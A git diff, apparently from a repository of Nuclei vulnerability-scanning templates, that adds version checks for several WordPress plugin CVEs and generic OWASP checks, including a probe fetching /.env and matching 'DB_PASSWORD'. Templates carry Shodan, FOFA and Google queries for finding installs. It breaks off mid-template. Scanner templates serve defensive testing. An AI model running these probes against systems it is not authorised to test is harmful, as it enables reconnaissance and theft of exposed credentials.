diff --git a/date.txt b/date.txt index 18b2d489ab..cf7fc14e4e 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241021 +20241022 diff --git a/poc.txt b/poc.txt index e6675774e4..81cd5a5683 100644 --- a/poc.txt +++ b/poc.txt @@ -3469,6 +3469,7 @@ ./poc/auth/idemia-biometrics-default-login-8140.yaml ./poc/auth/idemia-biometrics-default-login-8141.yaml ./poc/auth/idemia-biometrics-default-login.yaml +./poc/auth/identification-auth-failures.yaml ./poc/auth/ikuai-login-panel.yaml ./poc/auth/imgproxy-unauth.yaml ./poc/auth/imm-default-login.yaml @@ -7857,6 +7858,7 @@ ./poc/config/samba-config.yaml ./poc/config/sangfor-sysuser-conf.yaml ./poc/config/scrutinizer-config.yaml +./poc/config/security-misconfiguration.yaml ./poc/config/seeyon-a6-config-disclosure.yaml ./poc/config/server-config-exposure.yaml ./poc/config/servicenow-widget-misconfig.yaml @@ -33534,6 +33536,8 @@ ./poc/cve/CVE-2024-0984-71d91175d296ca328f8e62ec29060567.yaml ./poc/cve/CVE-2024-0984.yaml ./poc/cve/CVE-2024-0986.yaml +./poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml +./poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml ./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml ./poc/cve/CVE-2024-10014.yaml ./poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml @@ -33550,6 +33554,7 @@ ./poc/cve/CVE-2024-10079.yaml ./poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml ./poc/cve/CVE-2024-10080.yaml +./poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml ./poc/cve/CVE-2024-1021.yaml ./poc/cve/CVE-2024-1037-b7f7f3d961a0c33ea429c4b0e05a6902.yaml ./poc/cve/CVE-2024-1037.yaml @@ -42134,6 +42139,7 @@ ./poc/cve/CVE-2024-49232.yaml ./poc/cve/CVE-2024-49233-261ba1e19db5d8ea0ca73754d2643b65.yaml ./poc/cve/CVE-2024-49233.yaml +./poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml ./poc/cve/CVE-2024-49234-2a3ec3b8e61e55817a7572435c2420a7.yaml ./poc/cve/CVE-2024-49234.yaml ./poc/cve/CVE-2024-49235-398d09065c9d52a66ebe7e2938bdcb0f.yaml @@ -42192,9 +42198,11 @@ ./poc/cve/CVE-2024-49261.yaml ./poc/cve/CVE-2024-49262-58c69b03aeac6a6c2f651a6fea576e10.yaml ./poc/cve/CVE-2024-49262.yaml +./poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml ./poc/cve/CVE-2024-49263-8116ee4a4f994fa893383c133a8a6d59.yaml ./poc/cve/CVE-2024-49263.yaml ./poc/cve/CVE-2024-49264-6976ce8ecee9f1b1023d1b5f178241f2.yaml +./poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml ./poc/cve/CVE-2024-49264.yaml ./poc/cve/CVE-2024-49265-876650119d03582057b884e74652dcf7.yaml ./poc/cve/CVE-2024-49265.yaml @@ -42270,6 +42278,7 @@ ./poc/cve/CVE-2024-49304.yaml ./poc/cve/CVE-2024-49305-ec750a30a095a0ecaf36eb7e4f2b32f3.yaml ./poc/cve/CVE-2024-49305.yaml +./poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml ./poc/cve/CVE-2024-49306-1cdf03661e0a2c823137f9050fb9576e.yaml ./poc/cve/CVE-2024-49306.yaml ./poc/cve/CVE-2024-49307-da66eb5866b3f5651906f6c0badd8c14.yaml @@ -42279,6 +42288,7 @@ ./poc/cve/CVE-2024-49309-2743490b9daf5d0d5caf695b0ef2e8a9.yaml ./poc/cve/CVE-2024-49309.yaml ./poc/cve/CVE-2024-49310-399f2ba734a2c77b22872cdde47bca7e.yaml +./poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml ./poc/cve/CVE-2024-49310.yaml ./poc/cve/CVE-2024-49311-38f42991b2728e11dfb591840cf7f7b8.yaml ./poc/cve/CVE-2024-49311.yaml @@ -44192,8 +44202,10 @@ ./poc/cve/CVE-2024-8513.yaml ./poc/cve/CVE-2024-8514-d1287e8f3b1069f2713d7c995f6bc945.yaml ./poc/cve/CVE-2024-8514.yaml +./poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml ./poc/cve/CVE-2024-8515-c4009c842ec692ba826e1dd27a89a08d.yaml ./poc/cve/CVE-2024-8515.yaml +./poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml ./poc/cve/CVE-2024-8516-b0ae53f5d8bc37643f2a8b5730bca703.yaml ./poc/cve/CVE-2024-8516.yaml ./poc/cve/CVE-2024-8519-c09aac3ec9eb3ec8e899518d68fbb383.yaml @@ -44379,6 +44391,7 @@ ./poc/cve/CVE-2024-8850-0902b81489aa227f3c7bf015ba1bc328.yaml ./poc/cve/CVE-2024-8850-c5767b8067af0d0ab764024c9d8b2952.yaml ./poc/cve/CVE-2024-8850.yaml +./poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml ./poc/cve/CVE-2024-8853-4af00fcf0e5fb8017cf4fcd8671e540c.yaml ./poc/cve/CVE-2024-8853.yaml ./poc/cve/CVE-2024-8858-85931089ed9ebbb07f095bbb884fe4d0.yaml @@ -44568,6 +44581,7 @@ ./poc/cve/CVE-2024-9228-5d6c269fdf1aad171438d76ce7eba27a.yaml ./poc/cve/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml ./poc/cve/CVE-2024-9228.yaml +./poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml ./poc/cve/CVE-2024-9232-ae04b408f1f5990a6794318169fc173c.yaml ./poc/cve/CVE-2024-9232.yaml ./poc/cve/CVE-2024-9234-a70b6d1b82b579fc4a6ae49321787247.yaml @@ -44699,6 +44713,7 @@ ./poc/cve/CVE-2024-9538.yaml ./poc/cve/CVE-2024-9540-16b50ef118163619f4eb48f582dee59f.yaml ./poc/cve/CVE-2024-9540.yaml +./poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml ./poc/cve/CVE-2024-9543-2a84b7caa56d7b7baa1f298aba568720.yaml ./poc/cve/CVE-2024-9543.yaml ./poc/cve/CVE-2024-9546-393c04a252e7afb4c4921ddce751cf73.yaml @@ -44717,6 +44732,10 @@ ./poc/cve/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml ./poc/cve/CVE-2024-9587-cd342c17bf770ce7412f8a55478ea774.yaml ./poc/cve/CVE-2024-9587.yaml +./poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml +./poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml +./poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml +./poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml ./poc/cve/CVE-2024-9592-fff4a8a541e39d94b5f0980d29acdfe3.yaml ./poc/cve/CVE-2024-9592.yaml ./poc/cve/CVE-2024-9593-4b4e0d7ea60712fca2be81e1fce11f9a.yaml @@ -44730,6 +44749,7 @@ ./poc/cve/CVE-2024-9611.yaml ./poc/cve/CVE-2024-9616-74cbb74314a998222d17f0108bdd1b47.yaml ./poc/cve/CVE-2024-9616.yaml +./poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml ./poc/cve/CVE-2024-9634-d865b6fc0ac9d8d7dca8d3f6df89b5a1.yaml ./poc/cve/CVE-2024-9634.yaml ./poc/cve/CVE-2024-9647-7e123a97b0971ee91cbec517bbcda15d.yaml @@ -59235,6 +59255,7 @@ ./poc/injection/injection-guard-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/injection/injection-guard-plugin.yaml ./poc/injection/injection-guard.yaml +./poc/injection/injection.yaml ./poc/injection/jinhe-oa-cj6-getattout-sql-injection.yaml ./poc/injection/joomla-host-injection.yaml ./poc/injection/leaguemanager-sql-injection.yaml @@ -76495,6 +76516,7 @@ ./poc/other/Securestack-check.yaml ./poc/other/SecurestackWorkflow.yaml ./poc/other/Seeyou-ReportServer.yaml +./poc/other/Server-Side-Request-Forgery.yaml ./poc/other/SharpTV.yaml ./poc/other/SiteCore.yaml ./poc/other/Socks4.yaml @@ -76592,6 +76614,7 @@ ./poc/other/TVE-2024-105272055.yaml ./poc/other/TVE-2024-105272125.yaml ./poc/other/TVE-2024-105272130.yaml +./poc/other/TVE-2024-105272140.yaml ./poc/other/TVE-2024-105281100.yaml ./poc/other/TVE-2024-105291413.yaml ./poc/other/TVE-2024-105291421.yaml @@ -76653,6 +76676,7 @@ ./poc/other/X-Remote-IP.yaml ./poc/other/X-Rewrite-URL.yaml ./poc/other/X11Probe.yaml +./poc/other/XVE-2024-2116.yaml ./poc/other/Yes-059f1c0288ee3dfe1136ff4836457838.yaml ./poc/other/Yes-06932c1cf219422c203a87afb2aadded.yaml ./poc/other/Yes-164a8e3ab16c6e174a4b2681f22484c6.yaml @@ -78407,6 +78431,7 @@ ./poc/other/anand.yaml ./poc/other/anbo-fileRead.yaml ./poc/other/anchiva-下一代防火墙.yaml +./poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml ./poc/other/anchor-episodes-index-80033c17bf2f62f1615040da4cb0855c.yaml ./poc/other/anchor-episodes-index-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/anchor-episodes-index-plugin.yaml @@ -80797,6 +80822,7 @@ ./poc/other/broadscope-theme.yaml ./poc/other/broadscope.yaml ./poc/other/brocade-network-advisor.yaml +./poc/other/broken-access-control.yaml ./poc/other/broken-cryptography.yaml ./poc/other/broken-link-checker-15c779eefd59e483a066caaa11cc6e81.yaml ./poc/other/broken-link-checker-270ab183c749d4d134ad66952b1d5225.yaml @@ -83974,6 +84000,7 @@ ./poc/other/cryptocurrency-widgets-pack-df87c30565c27eb58e0271f0dfd6d08b.yaml ./poc/other/cryptocurrency-widgets-pack.yaml ./poc/other/cryptocurrency.yaml +./poc/other/cryptographic-failures.yaml ./poc/other/cryptxxx-dropper-malware.yaml ./poc/other/cryptxxx-malware.yaml ./poc/other/crywolf.yaml @@ -91530,6 +91557,7 @@ ./poc/other/insecure-content-warning-6c90b20a33edd819f7562bd7a9738958.yaml ./poc/other/insecure-content-warning.yaml ./poc/other/insecure-data-storage.yaml +./poc/other/insecure-design.yaml ./poc/other/insecure-intent.yaml ./poc/other/insecure-pendingintent.yaml ./poc/other/insecure-provider-path.yaml @@ -93603,6 +93631,7 @@ ./poc/other/loggedin-5904437c0e4687f5fad38a49657b6f13.yaml ./poc/other/loggedin.yaml ./poc/other/logging-enable.yaml +./poc/other/logging-monitoring-failures.yaml ./poc/other/logj4.yaml ./poc/other/logo-carousel-free-6a5c9b8f0001f00851bed5722f30e79a.yaml ./poc/other/logo-carousel-free-a965a63b9efc23785a762c4b8acba9c0.yaml @@ -96079,6 +96108,7 @@ ./poc/other/news-element.yaml ./poc/other/news-flash-d3c78ded753c2d5697cb56f6684f68ca.yaml ./poc/other/news-flash.yaml +./poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml ./poc/other/news-wall.yaml ./poc/other/news.yaml ./poc/other/newsletter-076137f3175de41fb442730014b1bb5f.yaml @@ -100906,6 +100936,8 @@ ./poc/other/rough-chart.yaml ./poc/other/route-bypass.yaml ./poc/other/routes-ini.yaml +./poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml +./poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml ./poc/other/row-seats-705b40740e42fe5417821b3880e5fc2b.yaml ./poc/other/row-seats-a95b8b6b9561d81849e245e8d18ae448.yaml ./poc/other/row-seats-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -103261,6 +103293,7 @@ ./poc/other/softether-vpn.yaml ./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml ./poc/other/softnext-spam.yaml +./poc/other/software-integrity-failures.yaml ./poc/other/software-license-manager-02438a90e5cab2e347474ab67e16a2e0.yaml ./poc/other/software-license-manager-08f24ceaa9760ed4a8e1dcab46bbae35.yaml ./poc/other/software-license-manager-307b2ee4cef742e8f25d8c099f335e8b.yaml @@ -118589,6 +118622,7 @@ ./poc/sql/CVE-2024-9222-6d3211dbe3c26f975c3e1ae606af3b47.yaml ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml +./poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml ./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml ./poc/sql/CVE-2024-9521-4587dbff6356b28863ebeee1f7d9133f.yaml ./poc/sql/CVE-2024-9529-db7341b5bf720c2f45daca0a630903ae.yaml @@ -120674,6 +120708,7 @@ ./poc/sql/gratisfaction-all-in-one-loyalty-contests-referral-program-for-woocommerce-02c9318c107dbdb36f47600a527c3e5c.yaml ./poc/sql/gravitate-qa-tracker-215d8b5197b6f7aeb2d3dbfbc8015b87.yaml ./poc/sql/gravityforms-1a904b571e110f0e4b9a34c3db5f68eb.yaml +./poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml ./poc/sql/greenshift-animation-and-page-builder-blocks-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/greenshift-animation-and-page-builder-blocks-e423087db1912dc71ed9a7fb3c664f80.yaml ./poc/sql/greenshift-animation-and-page-builder-blocks-f1f4db80fbee368982a32426ca676172.yaml @@ -123293,6 +123328,7 @@ ./poc/sql/wp-csv-to-database.yaml ./poc/sql/wp-custom-admin-interface-e7f4cac9b7138ea771801902dbf93547.yaml ./poc/sql/wp-custom-pages-4ecb0c3a43b68922bceefe42edb28dab.yaml +./poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml ./poc/sql/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml ./poc/sql/wp-dashboard-notes-2b4a88dbb7351e7d5e5abf5d4411034a.yaml ./poc/sql/wp-data-access-6477bf18cad6c823db485408d49b337b.yaml @@ -127841,6 +127877,7 @@ ./poc/wordpress/all-in-one-wp-migration-box-extension-1bca30bfa530491005d273161772bbf9.yaml ./poc/wordpress/all-in-one-wp-migration-box-extension.yaml ./poc/wordpress/all-in-one-wp-migration-c457cee6c5aa713c1063985f51820d05.yaml +./poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml ./poc/wordpress/all-in-one-wp-migration-d117a201289397334dc6793f85e0dcec.yaml ./poc/wordpress/all-in-one-wp-migration-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/all-in-one-wp-migration-dbb57e02ddae00246143735ae023fd47.yaml @@ -128469,6 +128506,7 @@ ./poc/wordpress/gotowp.yaml ./poc/wordpress/graphql-apiforwp-detect.yaml ./poc/wordpress/graphql-wpgraphql-detect.yaml +./poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml ./poc/wordpress/gsheetconnector-wpforms-d2948c1dd9d5eb0f8df60f0e61ec629c.yaml ./poc/wordpress/gsheetconnector-wpforms-pro-d2948c1dd9d5eb0f8df60f0e61ec629c.yaml ./poc/wordpress/gsheetconnector-wpforms-pro.yaml @@ -131140,6 +131178,10 @@ ./poc/wordpress/wp-custom-tables-xss-11434.yaml ./poc/wordpress/wp-custom-tables-xss-11435.yaml ./poc/wordpress/wp-custom-tables-xss.yaml +./poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml +./poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml +./poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml +./poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml ./poc/wordpress/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml ./poc/wordpress/wp-custom-widget-area.yaml ./poc/wordpress/wp-customer-reviews-352d038c1686829388214d7302c76842.yaml @@ -131847,6 +131889,7 @@ ./poc/wordpress/wp-food-manager.yaml ./poc/wordpress/wp-football-ab1c9b8c8ad02edb393b9c947c7bcf69.yaml ./poc/wordpress/wp-football.yaml +./poc/wordpress/wp-footnote-xss.yaml ./poc/wordpress/wp-footnotes-b40c4ab6051d7b912eccdd919bfd8f70.yaml ./poc/wordpress/wp-footnotes.yaml ./poc/wordpress/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml @@ -132694,6 +132737,7 @@ ./poc/wordpress/wp-members-88e4e1b584b84b271d582900c5f4302a.yaml ./poc/wordpress/wp-members-8db9f530e08181a4bd6b357664b8db50.yaml ./poc/wordpress/wp-members-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml ./poc/wordpress/wp-members-e432ea791c693777e599927023287a95.yaml ./poc/wordpress/wp-members-e93bf812b439d7519b22bf169d48b8da.yaml ./poc/wordpress/wp-members-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -135779,6 +135823,7 @@ ./poc/xss/akamai-arl-xss-249.yaml ./poc/xss/akamai-arl-xss.yaml ./poc/xss/analytify-plugin-xss.yaml +./poc/xss/application-pass-xss.yaml ./poc/xss/avada-xss.yaml ./poc/xss/avaya-aura-xss.yaml ./poc/xss/avchat-video-chat-xss.yaml @@ -136184,6 +136229,7 @@ ./poc/xss/wp-flagem-xss-11453.yaml ./poc/xss/wp-flagem-xss-11454.yaml ./poc/xss/wp-flagem-xss.yaml +./poc/xss/wp-footnote-xss.yaml ./poc/xss/wp-gutenberg-xss.yaml ./poc/xss/wp-insert-php-xss.yaml ./poc/xss/wp-knews-xss-11483.yaml diff --git a/poc/auth/identification-auth-failures.yaml b/poc/auth/identification-auth-failures.yaml new file mode 100644 index 0000000000..b0377a823a --- /dev/null +++ b/poc/auth/identification-auth-failures.yaml @@ -0,0 +1,20 @@ +id: identification-auth-failures +info: + name: Identification and Authentication Failures + author: Ali Baykara + severity: critical + description: | + Checks for vulnerabilities in login mechanisms and potential authentication bypasses. + tags: owasp, auth-failure + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + matchers: + - type: word + words: + - "admin" + - type: status + status: + - 200 diff --git a/poc/config/security-misconfiguration.yaml b/poc/config/security-misconfiguration.yaml new file mode 100644 index 0000000000..632c21b235 --- /dev/null +++ b/poc/config/security-misconfiguration.yaml @@ -0,0 +1,17 @@ +id: security-misconfiguration +info: + name: Security Misconfiguration + author: Ali Baykara + severity: high + description: | + Detects common security misconfigurations such as exposed .env files that contain sensitive information. + tags: owasp, misconfiguration + +requests: + - method: GET + path: + - "{{BaseURL}}/.env" + matchers: + - type: word + words: + - "DB_PASSWORD" diff --git a/poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml b/poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml new file mode 100644 index 0000000000..9d544dcf97 --- /dev/null +++ b/poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10002-71345796cb4129b3fb6d852524945f8d + +info: + name: > + Rover IDX <= 3.0.0.2905 - Authenticated (Subscriber+) Authentication Bypass to Administrator + author: topscoder + severity: low + description: > + The Rover IDX plugin for WordPress is vulnerable to Authentication Bypass in versions up to, and including, 3.0.0.2905. This is due to insufficient validation and capability check on the 'rover_idx_refresh_social_callback' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in to administrator. The vulnerability is partially patched in version 3.0.0.2905 and fully patched in version 3.0.0.2906. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10002 + metadata: + fofa-query: "wp-content/plugins/rover-idx/" + google-query: inurl:"/wp-content/plugins/rover-idx/" + shodan-query: 'vuln:CVE-2024-10002' + tags: cve,wordpress,wp-plugin,rover-idx,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rover-idx" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0.2905') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml b/poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml new file mode 100644 index 0000000000..2ac0f773ff --- /dev/null +++ b/poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10003-80927643a11133e8ee1977195d97aaa0 + +info: + name: > + Rover IDX <= 3.0.0.2903 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions + author: topscoder + severity: low + description: > + The Rover IDX plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 3.0.0.2903. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdf67099-5514-45ba-9a4c-10af984bf593?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-10003 + metadata: + fofa-query: "wp-content/plugins/rover-idx/" + google-query: inurl:"/wp-content/plugins/rover-idx/" + shodan-query: 'vuln:CVE-2024-10003' + tags: cve,wordpress,wp-plugin,rover-idx,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rover-idx" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0.2903') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml b/poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml new file mode 100644 index 0000000000..837418d01d --- /dev/null +++ b/poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10189-c70ac469531f5752b3a747a22314dda8 + +info: + name: > + Anchor Episodes Index (Spotify for Podcasters) <= 2.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via anchor_episodes Shortcode + author: topscoder + severity: low + description: > + The Anchor Episodes Index (Spotify for Podcasters) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's anchor_episodes shortcode in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10189 + metadata: + fofa-query: "wp-content/plugins/anchor-episodes-index/" + google-query: inurl:"/wp-content/plugins/anchor-episodes-index/" + shodan-query: 'vuln:CVE-2024-10189' + tags: cve,wordpress,wp-plugin,anchor-episodes-index,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/anchor-episodes-index/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "anchor-episodes-index" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml b/poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml new file mode 100644 index 0000000000..6c48d28cf5 --- /dev/null +++ b/poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3 + +info: + name: > + Plexx Elementor Extension <= 1.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Plexx Elementor Extension plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/147bada2-036d-4e35-9ba2-59ad382afeb9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-49234 + metadata: + fofa-query: "wp-content/plugins/plexx-elementor-extension/" + google-query: inurl:"/wp-content/plugins/plexx-elementor-extension/" + shodan-query: 'vuln:CVE-2024-49234' + tags: cve,wordpress,wp-plugin,plexx-elementor-extension,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/plexx-elementor-extension/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "plexx-elementor-extension" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml b/poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml new file mode 100644 index 0000000000..09c941f041 --- /dev/null +++ b/poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e + +info: + name: > + My Favorites <= 1.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The My Favorites plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/103e7658-78d6-414d-ad68-e9adf77f1c60?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-49263 + metadata: + fofa-query: "wp-content/plugins/my-favorites/" + google-query: inurl:"/wp-content/plugins/my-favorites/" + shodan-query: 'vuln:CVE-2024-49263' + tags: cve,wordpress,wp-plugin,my-favorites,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-favorites/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-favorites" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml b/poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml new file mode 100644 index 0000000000..a4bb740616 --- /dev/null +++ b/poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0 + +info: + name: > + Events Addon for Elementor <= 2.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Events Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and 